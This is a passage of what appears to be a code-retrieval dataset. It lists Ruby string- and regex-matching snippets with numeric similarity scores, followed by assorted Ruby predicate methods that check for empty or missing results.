"def match?(str, regex)\n if regex.nil? || regex.empty?\n return (str.nil? || str.empty?)\n end\n\n if !str.nil? && !str.empty? && [str[0], \".\"].include?(regex[0])\n first_matches = true\n else\n first_matches = false\n end\n\n if regex.length > 1 && regex[1] == \"*\"\n return match?(str, regex[2..-1]) || (first_matches && match?(str[1..-1], regex))\n else\n return first_matches && match?(str[1..-1], regex[1..-1])\n end\nend",
"def check(word)\n if /lab/ =~ word\n puts word\n else\n puts \"No Match!\"\n end \nend",
"def =~(string)\n to_re =~ string.to_str\n end",
"def match(other)\n String.new(self).match other\n end",
"def found_match(str)\n\tif dictionary.include?(str) # returns true if found in the dictionary\n\t\treturn str # don't stop the recursion, but return the word ?\n\tend\n\tfalse\nend",
"def substring?(long_string, short_string)\n\n long_string.match(short_string) != nil\n\nend",
"def string_value?(value)\n string = value.to_s\n [NonWordMatcher, KeywordMatcher].any? { |matcher|\n matcher.match string\n }\n end",
"def match?(input)\n input.casecmp(command_text).zero?\n end",
"def maybe_matching(ingredient_long_name,item)\n return (item.downcase.split(\" \") & ingredient_long_name.split(\" \")).size >= 1\nend",
"def custom_start_with?(string, substring)\n array_of_strings = string.split(\" \")\n array_of_strings.first == substring ? true : false\nend",
"def string_matches_pattern(pattern, string)\n case pattern\n when Regexp\n pattern === node['string']\n when String\n string.include?(pattern)\n end\nend",
"def custom_include?(str, substr)\n # return true if substring is found anywhere\n # within the string. Return false otherwise.\n len = substr.length\n str.chars.each_with_index do |char, idx|\n return true if str[idx, len] == substr\n end\n false\nend",
"def exact_match(user_word)\n @loader.arr.each do |word|\n return word if word == user_word\n end\n end",
"def exact_match_string\n @matches.nil? ? nil : @matches[0]\n end",
"def exact_match?(arguments, keyword_arguments)\n definition.exact_match?(arguments, keyword_arguments)\n end",
"def check_in(word)\n if /lab/i =~ word # regex with \"i\" for case insensitive.\n puts word\n else\n puts \"Not present.\" \n end\nend",
"def matches?\n symbol = @actual.is_a?(Symbol)\n actual = symbol ? @actual.to_s : @actual\n values = symbol ? @values.map { |v| v.is_a?(Symbol) ? v.to_s : v } : @values\n\n values.each do |value|\n return false unless actual.include?(value)\n end\n\n true\n end",
"def lab_check(word)\n if /lab/ =~ word\n puts word\n else\n puts \"no match\"\n end\nend",
"def match?(value)\n if regex?\n return true if name =~ value.to_s\n else\n return(name == convert(value) ? true : @aliases.include?(convert(value)))\n end\n end",
"def match?(value)\n if regex?\n return true if name =~ value.to_s\n else\n return(name == convert(value) ? true : @aliases.include?(convert(value)))\n end\n end",
"def exact?\n @exact\n end",
"def match?(given_names); end",
"def test_string_match\n s = \"a\"\n assert_equal(0, string_match(\"a\", s))\n assert_equal(0, string_match(/a/, s))\n assert_equal(0, string_match('\\(a\\|\\b\\)', s))\n assert_equal(0, string_match(/a|b/, s))\n assert_equal(0, string_match(/^a/, s))\n assert_equal(0, string_match(/a$/, s))\n assert_equal(0, string_match(/.*/, s))\n assert_equal(nil, string_match(/not-match/, s))\n \n end",
"def name_matches?(name, match)\n if match.include? '*'\n parts = match.split '*'\n first = parts.shift\n\n # if it's a leading *, this works because start_with?(\"\") always returns true\n # and has a length of 0 so the position stays at 0, which is correct\n if name.start_with?(first)\n # check for suffix match right away, accounting for a final * which split doesn't return\n if not match.end_with? '*' and not name.end_with?(parts.pop)\n return false\n end\n\n # check any internal wildcards\n position = first.length\n parts.each do |p|\n # find the substring starting at the position end of the last match\n found = name.index(p, position)\n if found and found >= position\n position = found + p.length # end of the matched substr\n else\n return false\n end\n end\n end\n elsif name == match\n true\n end\n end",
"def has_lab?(string)\n if string.downcase =~ /lab/\n puts \"#{string} includes the word lab.\"\n else\n puts \"#{string} does not include the word lab\"\n end\nend",
"def match?(pattern)\n pattern.split.each_with_index do |arg, index|\n return false unless arg == self[index]\n end\n return true\n end",
"def find?(word)\n !find(word).empty?\n end",
"def check_in(word)\n\tif /lab/ =~ word\n\t\tputs word\n\telse\n\t\tputs \"No match\"\n\tend\nend",
"def contains_any(str, fragments)\r\n return false unless Regexp.union(fragments) =~ str\r\n true\r\n end"
] | [
"0.7639058",
"0.7596726",
"0.7488582",
"0.746375",
"0.74020594",
"0.74020594",
"0.7239832",
"0.71905303",
"0.7163009",
"0.714809",
"0.7112216",
"0.70170546",
"0.70159245",
"0.70122075",
"0.7001217",
"0.69997746",
"0.697129",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.69289",
"0.6923522",
"0.68781143",
"0.68673676",
"0.6859612",
"0.68549395",
"0.6850278",
"0.6850278",
"0.68394494",
"0.6833291",
"0.6822109",
"0.68205667",
"0.6807489",
"0.68073195",
"0.6790686",
"0.6759885",
"0.6744091",
"0.6721982",
"0.6713113",
"0.67117286",
"0.6710488",
"0.6700137",
"0.66967916",
"0.669024",
"0.6684523",
"0.66705805",
"0.6669873",
"0.6668454",
"0.6666751",
"0.6660378",
"0.66503567",
"0.66344243",
"0.66271466",
"0.66239303",
"0.66239303",
"0.66176337",
"0.66176337",
"0.66176337",
"0.66005373",
"0.65911955",
"0.65866894",
"0.6583588",
"0.65799606",
"0.656111",
"0.6548577",
"0.65473306",
"0.6547204",
"0.6542767",
"0.6515532",
"0.6511743",
"0.6507482",
"0.6505852",
"0.64800584",
"0.64768535",
"0.6473542",
"0.64732516",
"0.64723617",
"0.6470017",
"0.6466353",
"0.64658916",
"0.64658916",
"0.6450653",
"0.64474833",
"0.6429299",
"0.6427048",
"0.64261234",
"0.6425263",
"0.6421192",
"0.64141256",
"0.64077866"
] | 0.6872769 | 33 |
The number of matches that were found. | def count
@flags.size
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def matched_count\n @results[MATCHED_COUNT]\n end",
"def return_count\n return @matchedCount\n end",
"def matched_size\n m = @match\n m.to_s.size if (not m.equal?(nil))\n end",
"def count\n Jhead.call(\"-c\", @match, @pattern).split(\"\\n\").size\n end",
"def exact_match_count\n (0..3).inject(0) do |count, index|\n count + (exact_match?(index) ? 1 : 0)\n end\n end",
"def total_matches_played\n count = 0\n\n matches.each do |match|\n unless match.finalized_date == nil \n count += 1\n end\n end\n\n count\n end",
"def count\n # There are two occurrences, but they are the same\n total = first locator(:total)\n return total.text.to_i if total\n results? ? raise(RuntimeError, \"Couldn't determine result count\", caller) : 0\n end",
"def total_count #:nodoc:\n total == 1 && !@group.nil? && @group['matches'] > 1 ? @group['matches'] : total\n end",
"def num_found\n\n if @solr_response[\"response\"] != nil\n # Normal Solr query\n return @solr_response[\"response\"][\"numFound\"]\n end\n\n if @solr_response[\"grouped\"] != nil\n # Grouped Solr query.\n total = 0\n @solr_response[\"grouped\"].keys.each do |key|\n total += @solr_response[\"grouped\"][key][\"matches\"]\n end\n return total\n end\n\n return 0\n rescue\n 0\n end",
"def num_exact_matches(code)\n matches = 0\n @pegs.each_with_index {|peg, i| matches += 1 if peg == code[i] }\n return matches\n end",
"def word_count\n @tried_solutions.length\n end",
"def matchedsize\n warn \"StringScanner#matchedsize is obsolete; use #matched_size instead\" if $VERBOSE\n matched_size\n end",
"def num_near_matches(guess)\n counter = 0\n guess.pegs.each { |peg| counter += 1 if @pegs.include?(peg) }\n counter - num_exact_matches(guess)\n end",
"def total\n #use group matches instead of numFound for grouped response\n if response[:numFound].nil? \n self[:grouped][blacklight_config['index']['group']]['matches'].to_s.to_i \n else \n response[:numFound].to_s.to_i\n end\n end",
"def all_hits_count\n return @all_results.length || 0\n end",
"def count\n Integer(parsed_body['meta']['total_results'])\n end",
"def hit_count()\n #This is a stub, used for indexing\n end",
"def number_of_results(results)\n printf(\"\\n%<results>d results found.\\n\\n\", results: results.length)\n end",
"def num_matches\n count = 0\n other_answers.each do |a|\n count += 1 if base_answer.food_groups == a.food_groups\n end\n count\n end",
"def filtered_hits_count\n return @filtered_results.length || 0\n end",
"def count_duplicate_matches(matches)\n matches.map { |match| matches_hash[Set.new match] }.reduce(0, :+)\n end",
"def count\n size = 0\n core_search.group(\"name.id, #{main_group_by_columns}\").each do |_x|\n size += 1\n end\n size\n end",
"def test_size\n @results.map {|node_name, classes|\n classes.size\n }.reduce(:+) || 0\n end",
"def length; return @results.length; end",
"def num_results(_args = {})\n @num_results ||= result_ids&.count || 0\n end",
"def num_hits; @hits.size; end",
"def num_hits; @hits.size; end",
"def num_hits; @hits.size; end",
"def _match_count (substr, text)\n return 0 if (!text || !substr)\n\n count = 0\n offset = 0\n while (result = text.index(substr, offset))\n count += 1\n offset = result + 1\n end\n count\n end",
"def num_near_matches(guess_object)\n pegs = guess_object.pegs\n count = 0\n pegs.each_with_index do |char, i|\n count += 1 if @pegs.include?(char) && char != @pegs[i]\n end\n count\n end",
"def num_exact_matches(code)\n self.pegs.zip(code.pegs).count { |(a,b)| a == b }\n end",
"def size\n @set['includedResults'].to_i\n end",
"def inc_match\n @matchedCount += 1\n end",
"def max_matches\n @max_matches || 1000\n end",
"def length\n @results_list.count\n end",
"def count_matches( n )\n i = 1\n p = n\n while p.to_s.size == i\n p *= n\n i += 1\n end\n i - 1\n end",
"def count\n raw_history['num_results']\n end",
"def update_total_matches\n self.correct_matches = (maker.code.select.with_index { |v, i| v == breaker.guess[i] }).length\n self.matches = 4 - (maker.code - breaker.guess).length - correct_matches\n end",
"def count\n each.size\n end",
"def exact_matches(other_code)\n num_matches = 0\n self.pegs.each_with_index do |code, index|\n if(code == other_code[index])\n num_matches += 1\n end\n end\n num_matches\n end",
"def count()\n @list_of_positions.length\n end",
"def count\n self.at('/RETS/COUNT')['Records'].to_i\n end",
"def returned_count\n reply.documents.length\n end",
"def result_count\n result_ids.size\n end",
"def matcher(match)\n match = match.flatten.uniq\n match.each do |m|\n @counter.count(m)\n end\n end",
"def total\n response[:numFound].to_s.to_i\n end",
"def count\n self.wordcounts.map(&:count).inject(0, :+)\n end",
"def top_hits_count\n return @top_results.length || 0\n end",
"def count\n cnt = 0\n begin\n if block_given?\n scanner = htable.getScanner(filtered_scan)\n scanner.each do |result|\n cnt += 1 if yield(Result.send(:new, result))\n end\n else\n scanner = htable.getScanner(filtered_scan_minimum)\n scanner.each { cnt += 1 }\n end\n ensure\n scanner.close if scanner\n end\n cnt\n end",
"def occurences_count\n\t\t\t\t\t\tHash.new(0).tap do |result|\n\t\t\t\t\t\t each { |item| result[item] += 1 }\n\t\t\t\t\t\tend\n\t\t\t\tend",
"def count\n to_a.size\n end",
"def count\n to_a.size\n end",
"def exact_matches\n matches = 0\n 4.times{ |x| matches += 1 if @num_guess[x] == @code[x] }\n matches\n end",
"def calculate_total_predictions(match)\n match.predictions.count.to_f\n end",
"def count\n each.count\n end",
"def count\n all.size\n end",
"def word_count\n return words.size\n end",
"def node_size\n @results.size\n end",
"def move_count; @move_count ||= match.moves.count; end",
"def get_total_games_played\n return games.size\n end",
"def total_results\n numberOfRecords\n end",
"def total_results\n numberOfRecords\n end",
"def count\n @target.count.to_i\n end",
"def record_count\n pair = text_blocks.each_cons(2)\n .select { |cons| cons[1] == \"Record Count:\" }.first\n pair && pair[0].to_i\n end",
"def count\n values.inject(0){|m, v| m + v.length}\n end",
"def num_researched\n @num_researched ||= worth_counting { count_researched }\nend",
"def size\n @size ||= search.size\n end",
"def games_played\n self.results.to_a.count\n end",
"def length; count end",
"def count\n @words.length\n end",
"def hit_count\n item_hash.deep_find(:hit_count, 0)\n end",
"def num_matches_in_file(fname, match_regexp)\n\n num_lines_per_batch = 5000\n\n num_matched = 0\n\n if File.exist? fname\n File.open(fname, \"r\") do |f|\n\n # use an enumerator to read just (num_lines_per_batch) lines at a time\n f.lazy.each_slice(num_lines_per_batch) do |lines|\n\n num_matched += lines.select { |line| line.match(match_regexp) }.count\n\n end\n\n end\n else\n num_matched = 0\n end\n\n num_matched\n end",
"def count\n index.length\n end",
"def numberOfResults\n @@numberOfResults\n end",
"def played_matchs_season(round, season = nil)\n count = 0\n matchs = find_matchs(round, season)\n\n matchs.each do |match|\n if match.finished?\n count += 1\n end\n end\n count\n end",
"def total\n @doclist['numFound']\n end",
"def total_hits_count\n return top_hits_count + all_hits_count\n end",
"def count(data)\n return data.length\n end",
"def count_matcher submatcher, method\n lambda do |string, index = 0, counts:|\n result = submatcher.call(string, index, counts: counts)\n\n if !Matchers.match?(result) || result.size.send(method, counts[result.name])\n result\n end\n end\n end",
"def get_total_games_played\n\t\treturn games.size\n\tend",
"def count\n @count ||= @query.count\n end",
"def length\n each.count\n end",
"def count\n @rules.size\n end",
"def hit_count\n self[:hit_count] && self[:hit_count].to_i\n end",
"def count_passing\n return self.passing_tests.size\n end",
"def total_count\n @all.size\n end",
"def find_counts()\n # Search through given fields for given text\n counts = Array.new\n find_text = @replace['replace']['find']\n @replace['replace']['tables'].each do |table, fields|\n query = find_query(find_text, table, fields.clone)\n @dbconn.query(query).each do |row|\n count_hash = {table: table, fields: fields, count: row['total']}\n counts.push count_hash\n end\n end\n counts\n end",
"def number_returned; 0; end",
"def count\n @mutex.synchronize { @count }\n end",
"def returned_nodes_count\n @traversal_position.returnedNodesCount\n end",
"def count_failing\n return self.failing_tests.size\n end",
"def count( query )\n data = index_request({ \"q\" => query })\n return data[\"response\"][\"numFound\"]\n end",
"def length\n @results.keys.length\n end",
"def count \n puts \"Tu as scrappé #{@result_scrap.count} élémént(s)\"\n return @result_scrap.count\n end",
"def num_possible\n return -1 if filled?\n\n @possible.size\n end",
"def getCount()\r\n available = @emojiFiles.size()\r\n used = @usedEmojis.size()\r\n return available, used\r\n end",
"def calculate\n @text.scan(\"#{@keyword}\").size\n end",
"def count\n @count\n end",
"def total_count()\n @raw_data.size\n end",
"def size\n @obj['results'].length\n end",
"def count\n all.count\n end"
] | [
"0.8698235",
"0.8089367",
"0.7729435",
"0.7666182",
"0.765437",
"0.75609905",
"0.7497716",
"0.74399954",
"0.73002255",
"0.70184815",
"0.7002051",
"0.6974099",
"0.6907366",
"0.6902071",
"0.6899067",
"0.6891406",
"0.6891183",
"0.68873537",
"0.6886565",
"0.6863194",
"0.6807652",
"0.67606825",
"0.6711681",
"0.67105836",
"0.6680861",
"0.66764474",
"0.66764474",
"0.66764474",
"0.666679",
"0.6662732",
"0.6629963",
"0.6624765",
"0.6615171",
"0.660899",
"0.66016805",
"0.6571134",
"0.6570022",
"0.65629655",
"0.6561363",
"0.65400916",
"0.6532567",
"0.65159816",
"0.6509116",
"0.6498328",
"0.64960164",
"0.64872324",
"0.6483369",
"0.64520776",
"0.6449919",
"0.6445698",
"0.6435145",
"0.6435145",
"0.6421304",
"0.640867",
"0.63856834",
"0.63824034",
"0.6381493",
"0.6359284",
"0.6344597",
"0.63416445",
"0.63403136",
"0.63403136",
"0.63383806",
"0.6330344",
"0.63287896",
"0.63208705",
"0.63201076",
"0.63076025",
"0.63065904",
"0.6295503",
"0.62942123",
"0.6282745",
"0.62645584",
"0.62640274",
"0.62582844",
"0.6254444",
"0.6240366",
"0.62345284",
"0.62343097",
"0.6229755",
"0.6228348",
"0.62235403",
"0.6222981",
"0.6221404",
"0.6221378",
"0.6220951",
"0.62104833",
"0.6209806",
"0.6207021",
"0.6184694",
"0.6176302",
"0.61745906",
"0.6173244",
"0.6170728",
"0.61649007",
"0.6160374",
"0.6157427",
"0.6154779",
"0.615333",
"0.61488646",
"0.61477846"
] | 0.0 | -1 |
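A minimal runnable sketch of the record above: `count` simply reports the size of an internal `@flags` collection. The surrounding class, the `[name, value, negated]` tuple layout, and the sample data are illustrative assumptions, not part of the dataset.

# Hypothetical holder for flag matches; each entry is [name, value, negated].
class FlagMatches
  def initialize(flags)
    @flags = flags
  end

  # The number of matches that were found.
  def count
    @flags.size
  end
end

matches = FlagMatches.new([["--verbose", true, false], ["--no-color", false, true]])
puts matches.count # => 2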
Whether a single unique match was found. | def found_unique?
@flags.size == 1
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def match?\n false\n end",
"def one_result\n matched_combined = @matched_names.ids + @matched_tags.ids +\n @matched_queries.ids + @matched_creator.ids +\n @matched_modifier.ids\n return Asq.find(matched_combined[0]) if matched_combined.length == 1\n false\n end",
"def found_exact?\n @found_exact\n end",
"def matched?\n !failed?\n end",
"def unique?(name)\n tgts = resolve_mapping(name)\n targets = tgts.is_a?(Array) ? tgts : find(tgts)\n targets.size == 1\n end",
"def unique?\n !! @unique\n end",
"def matched?\n not @match.equal?(nil)\n end",
"def unique?\n if defined?(@unique)\n @unique\n else\n true\n end\n end",
"def unique?\n return @data[\"unique\"]==true\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def what_is_unique?\n cache_options[:unique].to_s =~ /true|false/\n end",
"def partial_match?\n @json['results'][0]['partial_match'] == true\n end",
"def mapsUnique?()\n return false unless passed_filter?\n return false if unmapped_Ns? || unmapped?\n if @chrom =~ /^\\d+:\\d+:\\d+$/\n false\n else\n true\n end\n end",
"def one?\n result.equal?(:one)\n end",
"def match\n true\n end",
"def found?\n\t\t\t!!@found\n\t\tend",
"def is_matched(ind)\n\t\treturn @tile_Array[ind].return_match\n\tend",
"def exact_match?\n !partial_match?\n end",
"def same?\n similarities.size == 1 && similarities.first.distance.zero? # The same\n end",
"def check_unique\n bar = Bar.where(:name => self.name, :user_id => self.user_id)\n if bar != nil\n \treturn false\n end\n end",
"def find?\n find_duplicate.nil?\n end",
"def found?\n return false if no_search\n\n id.present? || records.present?\n end",
"def unique?\n if @data.fetch(:Index_type) == \"UNIQUE\" || @data.fetch(:Non_unique).to_i == 0\n return true\n else\n return false\n end\n end",
"def terminal?\n matches.length == 0\n end",
"def includedOnce(haystack, needle)\n \n counter = haystack.count { |x| x == needle}\n if counter == 1\n return true\n elsif counter > 1\n return false\n else\n return false\n end\n \nend",
"def is_unique?(str)\n\nend",
"def opt_unique?(str)\n\texists = {}\n\tfor i in 0..str.length-1\n\t\tif exists[str[i]]\n\t\t\treturn false\n\t\telse\n\t\t\texists[str[i]] = true\n\t\tend\n\tend\n\ttrue\nend",
"def matched?( other = nil )\n return full? if other.nil?\n matches.include? other\n end",
"def unique?\n indexes.any?{|i| i.unique}\n end",
"def unique_key? object\n _check = self.find(object.key)\n _unique = !_check || _check != object\n end",
"def matching?(word_to_match)\n anagram?(word_to_match) && !words_the_same?(word_to_match)\n end",
"def unique?\n false\n end",
"def expected_duplicate?(id)\n EXPECTED_DUPLICATES.include? id\n end",
"def match?(metadata)\n @matches.each do |match|\n if filter_select(match, metadata) and !match.negate\n return true\n end\n if filter_select(match, metadata) and match.negate\n return false\n end\n end\n false\n end",
"def check_duplicates(str)\n current_user.movies.each do |movie|\n if movie.title == str\n return false\n end\n end\n end",
"def unique?\r\n @opts[:unique]\r\n end",
"def has_match?\n !match_x.nil? && !match_y.nil?\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def one_candidate?\n @candidates.count == 1\n end",
"def is_stable?\n # Every person's partner should match up\n @matches.all? { |k,v| is_matched?(k, v) }\n end",
"def more_than_once?(text, param, regex)\n count = text.scan(regex).size\n puts \"#{param}: #{count} time\"\n if count > 1\n puts \"- ERROR: '#{param}' appears more than one time on the page.\"\n return true\n end\n false\nend",
"def uniq?(uniq)\n { 'false': false, 'true': true }[uniq.to_sym]\n end",
"def empty?\n matched.empty?\n end",
"def any_duplicates?\n return @any_duplicates if defined? @any_duplicates\n\n return @any_duplicates = false if @composition.allow_duplicates?\n\n @any_duplicates = @heroes_by_segment.any? do |map_segment_id, hero_ids|\n hero_ids.uniq.size != hero_ids.size\n end\n end",
"def is_duplicate(name_str)\n schedules = @current_user.schedules.where(\"LOWER(schedules.name) LIKE LOWER(?)\", name_str).take\n if schedules && !@testing\n return true\n else\n return false\n end\n end",
"def is_a_match(total_in_common)\n total_in_common >= 2 ? true : false\n end",
"def uniquely_identified_by_any_peptides?\n unique_spectra > 0\n end",
"def unique?\n if @args[:data][:Index_type] == \"UNIQUE\"\n return true\n else\n return false\n end\n end",
"def unique?(field)\n !multiple?(field)\n end",
"def first_letter_match\n @query[0] == @reference[0]\n end",
"def single?\r\n @headers[\"results\"].nil?\r\n end",
"def matches?(*)\n # by default nothing matches\n nil\n end",
"def unique_hash_already_exists?\n return Entry.where(feed_id: self.feed_id, unique_hash: self.unique_hash).exists?\n end",
"def match_id_array_exists?(match_id_array)\n match_id_array.each do |match_id|\n return true if @matched_cells.has_key?(match_id)\n end\n end",
"def has?(arg)\n !!find(arg)\n end",
"def matches?(value)\n !!(value.to_s =~ MATCHER)\n end",
"def is_false_duplicate?\n payment_complete? && has_completed_duplicates?\n end",
"def unique_id?(h, id)\n h.at_css(\"[id='#{id}']\").one?\n end",
"def double?\n if self.id\n return true if self.torrent_url && Torrent.not_self(self.id).find_by_torrent_url(self.torrent_url)\n return true if self.transmission_hash_string && Torrent.not_self(self.id).find_by_transmission_hash_string(self.transmission_hash_string)\n return true if self.name && Torrent.not_self(self.id).find_by_name(self.name)\n else\n return true if self.torrent_url && Torrent.find_by_torrent_url(self.torrent_url)\n return true if self.transmission_hash_string && Torrent.find_by_transmission_hash_string(self.transmission_hash_string)\n return true if self.name && Torrent.find_by_name(self.name) \n end\n \n \n return false\n end",
"def exact?\n @exact\n end",
"def unique?\n self[:unique] ? true : false\n end",
"def matched?(str)\r\n # puts \">>> #{self.matcher.source}\"\r\n # puts \">>> #{str}\"\r\n return false if (!self.implicit && str[0] != \"!\")\r\n if (self.matcher =~ str) != nil\r\n $bot.last_match = $~\r\n $log.info(\"/#{self.matcher.source}/ matched #{str}\")\r\n return true\r\n end\r\n false\r\n end",
"def is_match? cells\n\t\towners = []\n\n\t\tcells.each_with_index do |cell, i|\n\t\t\towners[i] = cell.name\n\t\tend\n\n\t\towners.uniq.length == 1\n\tend",
"def exact_match?\n search_settings = @settings['search']\n matching = search_settings.fetch('matching', 'pattern').normalize_matching\n matching == :exact\n end",
"def single_match(matches, request, command)\n\n if matches.length == 0\n Views::no_match_error \"projects\", request\n return false\n elsif matches.length > 1\n Views::ambiguous_project matches, command\n return false\n else\n match = matches[0]\n end\n end",
"def repeated_name?()\n sql = \"SELECT * FROM spellbooks\n WHERE name = $1\"\n values = [@name]\n result = SqlRunner.run(sql, values)\n return true if result.first != nil && result.first['id'].to_i != @id\n return false\n end",
"def exists?\n !count.zero?\n end",
"def duplications?\n size != uniq.size \n end",
"def unique_flag_negative?\n found_unique? ? @flags.first[2] : nil\n end",
"def found_multiple?\n @flags.size > 1\n end",
"def match?(name); end",
"def multiple_match?\n acknowledgement_detail = locate_element(@original_body, ACKNOWLEDGEMENT_DETAIL_XPATH)\n return false unless acknowledgement_detail\n\n acknowledgement_detail.nodes.first == MULTIPLE_MATCHES_FOUND\n end",
"def unique(answer)\n\tanswer.split(\"\").each do |n|\n\t\treturn false if answer.count(n) > 1\n\tend\n\ttrue\nend",
"def seen?(word)\n length = word.length\n\n (@seen.has_key?(length) && @seen[length].include?(crc32(word)))\n end",
"def any_results?\n races.any?(&:any_results?)\n end",
"def object?\n marc_leader_06_r_match = record.leader.byteslice(6) == 'r'\n\n marc_leader_06_e_match = record.leader.byteslice(6) == 'e'\n marc_008_25_match = record.fields('008').find do |field|\n field.value.byteslice(25) == 'd'\n end\n\n marc_006_match = record.fields('006').find do |field|\n field.value.byteslice(0) == 'r' ||\n field.value.byteslice(8) == 'd'\n end\n\n marc_007_match = record.fields('007').find do |field|\n field.value.byteslice(0) == 'd'\n end\n\n return true if marc_leader_06_r_match ||\n (marc_leader_06_e_match && marc_008_25_match) ||\n marc_006_match ||\n marc_007_match\n end",
"def matched?(other_user)\n matched.include?(other_user)\n end",
"def result?\n !@result.equal?(NOT_SET)\n end",
"def match?(id, email)\n return true unless authenticated? #always match on \"all\" group\n return false if id == GROUP_ALL_URI # all does not match anything\n id == identifier || email == identifier\n end",
"def exists?\n return id.to_s =~ /\\d+/\n end",
"def occur_once?(featured_number)\n num_string = featured_number.to_s\n num_array = num_string.split('')\n num_array.none? { |num| num_string.count(num) > 1 }\nend",
"def unique?(name)\n envs = find(name)\n envs.size == 1\n end",
"def is_match?(value)\n\t\t\tpattern_groups = group_patterns\n\t\t\tif pattern_groups[:negatives].empty?\n\t\t\t\tnegatives = true\n\t\t\telse\n\t\t\t\tnegatives = pattern_groups[:negatives].all? { |x| is_single_match?(x, value) }\n\t\t\tend\n\n\t\t\tif pattern_groups[:positives].empty?\n\t\t\t\tpositives = true\n\t\t\telse\n\t\t\t\tpositives = pattern_groups[:positives].any? { |x| is_single_match?(x, value) }\n\t\t\tend\n\n\t\t\treturn false if pattern_groups[:positives].empty? && pattern_groups[:negatives].empty?\n\t\t\treturn positives && negatives\n\t\tend",
"def row_exists?(unique_identifier)\n wait_for_results\n exists? result_row(unique_identifier)\n end",
"def row_exists?(unique_identifier)\n wait_for_results\n exists? result_row(unique_identifier)\n end",
"def exact?\n !!@repeat\n end",
"def first?\n\t locate == 1\n\tend",
"def find?(word)\n !find(word).empty?\n end",
"def is_unique\n return true if fact_type.is_a?(LinkFactType) or # Handle objectification roles\n fact_type.all_role.size == 1 # and unary roles\n\n uniqueness_constraint ? true : false\n end",
"def is_one_pair?\n repetitions(2).keys.count == 1\n end",
"def exist?\n !count.zero?\n end",
"def full_house?\n matched = self.matched_cards\n found_pair = false\n found_three = false\n for rank, matches in matched do\n found_pair = true if matches.count == 2\n found_three = true if matches.count == 3\n end\n return found_pair && found_three \n end",
"def matches?(other)\n self.exists? && other.exists? && self.hash == other.hash\n end",
"def has_been_proposed?(person)\n @matches.each do |_,v|\n return true if v == person\n end\n false\n end"
] | [
"0.6884946",
"0.6743467",
"0.66666603",
"0.6646708",
"0.6625602",
"0.6497823",
"0.6478675",
"0.64102274",
"0.6392388",
"0.6372588",
"0.6372588",
"0.6372588",
"0.6364799",
"0.6364799",
"0.6321445",
"0.6251311",
"0.624624",
"0.61834055",
"0.6135826",
"0.61332864",
"0.6130879",
"0.6125903",
"0.6114986",
"0.61142695",
"0.6096608",
"0.60944927",
"0.60813457",
"0.60811627",
"0.6062501",
"0.60576344",
"0.6057611",
"0.6054877",
"0.6018599",
"0.60000753",
"0.59957504",
"0.59862137",
"0.5968593",
"0.59660685",
"0.59657377",
"0.5953032",
"0.5906937",
"0.5901133",
"0.5897711",
"0.5897711",
"0.5891927",
"0.58864254",
"0.58844113",
"0.5882316",
"0.58713305",
"0.5860993",
"0.5858116",
"0.5849646",
"0.58378035",
"0.58296776",
"0.5826915",
"0.58267874",
"0.5826145",
"0.5823682",
"0.5815498",
"0.5805555",
"0.57806575",
"0.5778354",
"0.57763994",
"0.5770581",
"0.5765877",
"0.57575905",
"0.574654",
"0.5746481",
"0.57456374",
"0.573384",
"0.5732977",
"0.5726564",
"0.5722463",
"0.57123",
"0.57100976",
"0.57033145",
"0.56834966",
"0.5683094",
"0.56768095",
"0.5659092",
"0.56561106",
"0.56454396",
"0.5634761",
"0.56323075",
"0.5624714",
"0.56220484",
"0.562055",
"0.5614543",
"0.5597641",
"0.55872196",
"0.55872196",
"0.5587015",
"0.5581552",
"0.5574121",
"0.5571467",
"0.557091",
"0.55690634",
"0.5557305",
"0.5553822",
"0.55520374"
] | 0.74470997 | 0 |
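A hedged sketch of the `found_unique?` record above in context: exactly one stored match means the lookup was unambiguous. The class name and sample data are assumptions for illustration.

class FlagMatches
  def initialize(flags)
    @flags = flags
  end

  # Whether a single unique match was found.
  def found_unique?
    @flags.size == 1
  end
end

puts FlagMatches.new([["--force", true, false]]).found_unique? # => true
puts FlagMatches.new([]).found_unique?                         # => false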
Whether no matches were found. | def not_found?
@flags.empty?
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def empty?\n matched.empty?\n end",
"def nothing_found?\n @matching_documents.nil? or @matching_documents.entries.empty?\n end",
"def nil?\n @matches.nil?\n end",
"def matched?\n not @match.equal?(nil)\n end",
"def matched?\n !failed?\n end",
"def expects_none?\n count_specified? ? matches_count?(0) : false\n end",
"def terminal?\n matches.length == 0\n end",
"def match?\n false\n end",
"def empty?\n self.results.empty?\n end",
"def hasResults?\n ! @results.empty?\n end",
"def results?() ! find(locator(:no_results_message)) end",
"def has_match?\n !match_x.nil? && !match_y.nil?\n end",
"def any_results?\n races.any?(&:any_results?)\n end",
"def nothingToSearch? \n\t\treturn $toSearch.empty? \n\tend",
"def has_results?\n true\n end",
"def any?\n false\n end",
"def no_results\n print \"0 results found. \\n\"\n end",
"def empty?\n qr_responses.blank? && sip_responses.blank?\n end",
"def empty?\n return @querys.empty?\n end",
"def empty?\n\t\treturn [ self.one_of, self.all_of, self.none_of ].all?( &:empty? )\n\tend",
"def free?\n matches.length < match_positions\n end",
"def __empty?\n all?(&:__empty?)\n end",
"def none?\n !any?\n end",
"def empty?\n count.zero?\n end",
"def empty?\n count.zero?\n end",
"def empty?\n count.zero?\n end",
"def success?\n return @stats.missing_tags.empty?\n end",
"def no_more?\n more_results == :NO_MORE_RESULTS\n end",
"def matches?(*)\n # by default nothing matches\n nil\n end",
"def has_results?\n !(name == 'aggregate' &&\n pipeline.find {|op| op.keys.include?('$out') })\n end",
"def any?\n ! empty?\n end",
"def any?\n !total_pages.zero?\n end",
"def empty?\n return true unless @all\n @all.empty?\n end",
"def empty?\n count == 0\n end",
"def empty?\n count == 0\n end",
"def any?\n messages.count.positive?\n end",
"def empty?\n count <= 0\n end",
"def empty?\n count == 0\n end",
"def empty?\n all.empty?\n end",
